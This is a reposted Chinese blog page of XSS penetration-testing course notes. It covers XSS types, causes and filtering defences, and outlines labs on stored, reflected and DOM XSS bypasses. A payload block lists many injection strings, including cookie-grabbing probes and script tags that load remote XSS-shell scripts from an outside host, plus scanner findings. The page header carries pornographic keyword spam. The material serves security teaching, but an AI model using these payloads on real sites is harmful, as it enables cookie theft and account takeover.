日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)

發布時間:2023/12/31 编程问答 62 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Xss跨站腳本攻擊

    • Xss通用明文 &&表單劫持
      • 跨站腳本攻擊漏洞概念,
      • 漏洞原理和危害,
      • 掌握反射型、存儲型XSS漏洞利用方法
    • web安全工程師-03-XSS漏洞原理與利用
  • 第一章:XSS基礎
    • 1.1 XSS介紹與原理~1
    • 1.2 存儲型XSS實戰
    • 1.3 反射型XSS實戰
    • 1.4 DOM型XSS實戰
    • 1.5 XSS輔助測試工具
  • 第二章: XSS實戰與防御機制繞過
    • 2.1 存儲型XSS多場景實戰及Bypass詳解
    • 2.3 反射型XSS多場景實戰及Bypass詳解~1
      • payload 多次 url 編碼
    • 2.4 DOM型XSS多場景實戰及Bypass詳解~1
  • 第三章:XSS高級

淺談XSS漏洞挖掘 https://mp.weixin.qq.com/s/6oT63IxXodWte3WLw-zKRw有輸入的地方就試試,對可以觸發XSS的地方做總結輸入即輸出 對用戶的輸入在沒有進行任何過濾的情況下進行了輸出。 輸出報錯信息的時候直接把用戶輸入的內容直接進行了輸出。 猜想可能由于現在對信息安全的重視,涉及到業務方面的輸入數據的過濾編碼已經很成熟, 對一些錯誤信息的輸出可能重視還不夠大。該漏洞的觸發就是在返回錯誤信息的時候回返回方法名,這個方法名攻擊者可以自己定義,導致觸發了XSS漏洞 在返回錯誤信息的時候回返回參數FUZZ參數觸發XSS XSS(跨站腳本)概述 Cross-Site Scripting 簡稱為“CSS”, 為避免與前端疊成樣式表的縮寫"CSS"沖突,故又稱XSS。 一般XSS可以分為如下幾種常見類型:1.反射性XSS;2.存儲型XSS; 3.DOM型XSS;XSS漏洞一直被評估為web漏洞中危害較大的漏洞, 在OWASP TOP10的排名中一直屬于前三的江湖地位。XSS是一種發生在前端瀏覽器端的漏洞,所以其危害的對象也是前端用戶。形成XSS漏洞的主要原因是程序對輸入和輸出沒有做合適的處理, 導致“精心構造”的字符輸出在前端時被瀏覽器當作有效代碼解析執行從而產生危害。因此在XSS漏洞的防范上, 一般會采用“對輸入進行過濾”和“輸出進行轉義”的方式進行處理: 輸入過濾:對輸入進行過濾,不允許可能導致XSS攻擊的字符輸入; 輸出轉義:根據輸出點的位置對輸出到前端的內容進行適當轉義;"'><textarea+autofocus+onfocus=alert(45)><iframe/src=JavaScriPt:alert(45)><script>alert(aming)</script><script src=”http://192.168.1.19/xssshell.jsp?v=336699″></script> ><script>alert(document.cookie)</script> =’><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> <script>alert(‘XSS’)</script> <img src=”javascript:alert(‘XSS’)”> <script>alert(‘Vulnerable’)</script> <IFRAME SRC=javascript:alert(‘XSS’)></IFRAME> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <TABLE BACKGROUND=”javascript:alert(‘XSS’)”> <SCRIPT a=”>” SRC=”http://xxxx/a.js”></SCRIPT> <SCRIPT =”>” SRC=”http://xxxxx/a.js”></SCRIPT> <SCRIPT a=”>” ” SRC=”http://xxxxx/a.js”></SCRIPT> <SCRIPT “a=’>’” SRC=”http://xxxxx/a.js”></SCRIPT><img src=x onerror=alert(45)> <svg/onload=alert(45)> <script>alert(45)</script> <img/src onerror=alert(45)> "><iframe/src=JavaScriPt:alert(45)> <video/poster/onerror=alert(45)> <audio src onloadstart=alert(45)> <meter onmouseover=alert(45)>0</meter> <marquee onstart=alert(45)> <select autofocus onfocus=alert(45)> <input autofocus onfocus=alert(45)> <keygen autofocus onfocus=alert(45)> <textarea autofocus onfocus=alert(45)><original query> onhwul=64 <svg/onload=alert(45)> | reflected XSS Code | <script>alert(45)</script> | reflected XSS Code | | 9 | HIGH | XSS | GET | type | <marquee onstart=alert(45)> | reflected HTML5 XSS Code | | 10 | HIGH | XSS | GET | type | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code | | 11 | HIGH | XSS | GET | type | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code | | 12 | HIGH | XSS | GET | type | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code | | 13 | HIGH | XSS | GET | type | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code | | 14 | HIGH | XSS | GET | type | <img/src onerror=alert(45)> | reflected XSS Code | | 15 | HIGH | XSS | GET | type | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code | | 16 | HIGH | XSS | GET | type | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code | | 17 | HIGH | XSS | GET | type | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |http://www.xxxx.com/tool/search.php? title=88952634 &mod=main &file=html &action=index"'><textarea+autofocus+onfocus=alert(45)> &dosubmit=1

Xss通用明文 &&表單劫持




  • 跨站腳本攻擊漏洞概念,

  • 漏洞原理和危害,

  • 掌握反射型、存儲型XSS漏洞利用方法





















web安全工程師-03-XSS漏洞原理與利用

第一章:XSS基礎

1.1 XSS介紹與原理~1



打cookie xss + csrf getshell

用來攻擊 使用瀏覽器 打開這個 頁面的 用戶 獲取cookie 正常用戶/管理員 權限

反射型 - 非存儲型 通常 xss 代碼 Payload (js) 通過 get 某個參數 傳入 后端 沒有經過 存儲 直接反射回 用戶頁面 (html)上

存儲型payload 存 在某一介質 (數據庫、緩存、文件)用戶 查看這個頁面時 展示 頁面 取出數據 時 執行

跟反射型類似但接受者 不再是 后端程序 而是 js 拿到參數 直接 在頁面 顯示

html 實體編碼 大多數 管用白名單 發表文章 富文本 過濾掉 js代碼 或者 涉及非法的屬性只div a p b 標簽 排除onError、onLoad 事件屬性 只 src 黑名單 可能會繞過xss 業務場景 對癥 反射 get 輸入 script代碼塊 輸出

xss 流程 payload 構造 驗證 修復 xss 高階 新用法 xss持久化 xss系列

1.2 存儲型XSS實戰






















被實體轉義





我日我自己




用戶登錄 憑證

換個用戶登錄


盜取cookie

怎么修復















看 數據庫 中 可控字段

1.3 反射型XSS實戰


通過 url 參數 傳入 惡意代碼






value 閉合 掉




反射型 修復


orm 模型 查詢










剛才 訪問頁面 自動給 焦點 就會一直觸發

語法
閉合
或者 屬性 彈窗



html 實體轉義掉



1.4 DOM型XSS實戰



js 實現






dom型 不一定 是 url 傳過來的 參數








1.5 XSS輔助測試工具




















繞過





















第二章: XSS實戰與防御機制繞過

2.1 存儲型XSS多場景實戰及Bypass詳解


















  • 全局 配置文件
















去掉空格 截斷函數



反斜杠 處理

處理 編碼問題





數據展示 的 類



實體轉義 標簽 防止 執行

























輸入 沒做處理

輸出 做了處理 沒做完全

  • 修復 實體轉義



















編寫 payload





長度限制 添加注釋


注釋 閉合 網頁標簽







dom節點








多段提交
注釋 執行

多點限制 加密 編碼
取值 得值 謹慎

2.3 反射型XSS多場景實戰及Bypass詳解~1

  • 插件 漏洞













payload 多次 url 編碼




瀏覽器默認 解碼一次 url編碼



















2.4 DOM型XSS多場景實戰及Bypass詳解~1
































存儲 + DOM











漏洞 分析 + 挖掘

第三章:XSS高級

總結

以上是生活随笔為你收集整理的Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。